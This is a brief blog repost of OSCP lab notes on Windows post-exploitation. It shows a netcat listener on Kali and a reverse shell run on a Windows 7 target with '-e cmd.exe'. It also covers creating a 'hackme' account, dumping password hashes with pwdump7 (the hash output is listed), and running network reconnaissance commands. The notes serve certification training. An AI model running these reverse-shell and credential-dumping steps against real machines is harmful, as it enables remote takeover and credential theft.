OSCP Security Technology - Windows Post Exploitation

时间:2021-10-23
本文章向大家介绍OSCP Security Technology - Windows Post Exploitation,主要包括OSCP Security Technology - Windows Post Exploitation使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

OSCP Security Technology - Windows Post Exploitation

Software stores in folder - C:/Users/IEUser/
Create an account named hackme.
Go back to our Kali Linux
locate fgdump
locate wce
nc -nvlp 4444

Run nccat as administrator on Windows 7.

-nv 192.168.1.22 4444 -e cmd.exe

The connection is established now.

Get passwords using pwdump7.exe.

Save these passwords on Linux.

Administrator:500:NO PASSWORD*********************:FC525C9683E8FE067095BA2DDC971889:::                                            
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::                                                    
IEUser:1000:NO PASSWORD*********************:FC525C9683E8FE067095BA2DDC971889:::                                                  
sshd:1001:NO PASSWORD*********************:NO PASSWORD*********************:::                                                    
sshd_server:1002:NO PASSWORD*********************:8D0A16CFC061C3359DB455D00EC27035:::                                             
hackme:1003:NO PASSWORD*********************:32ED87BDB5FDC5E9CBA88547376818D4::: 

Explore

route  print
arp -a
netstat -ano
dir /A
相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。

原文地址:https://www.cnblogs.com/keepmoving1113/p/15449803.html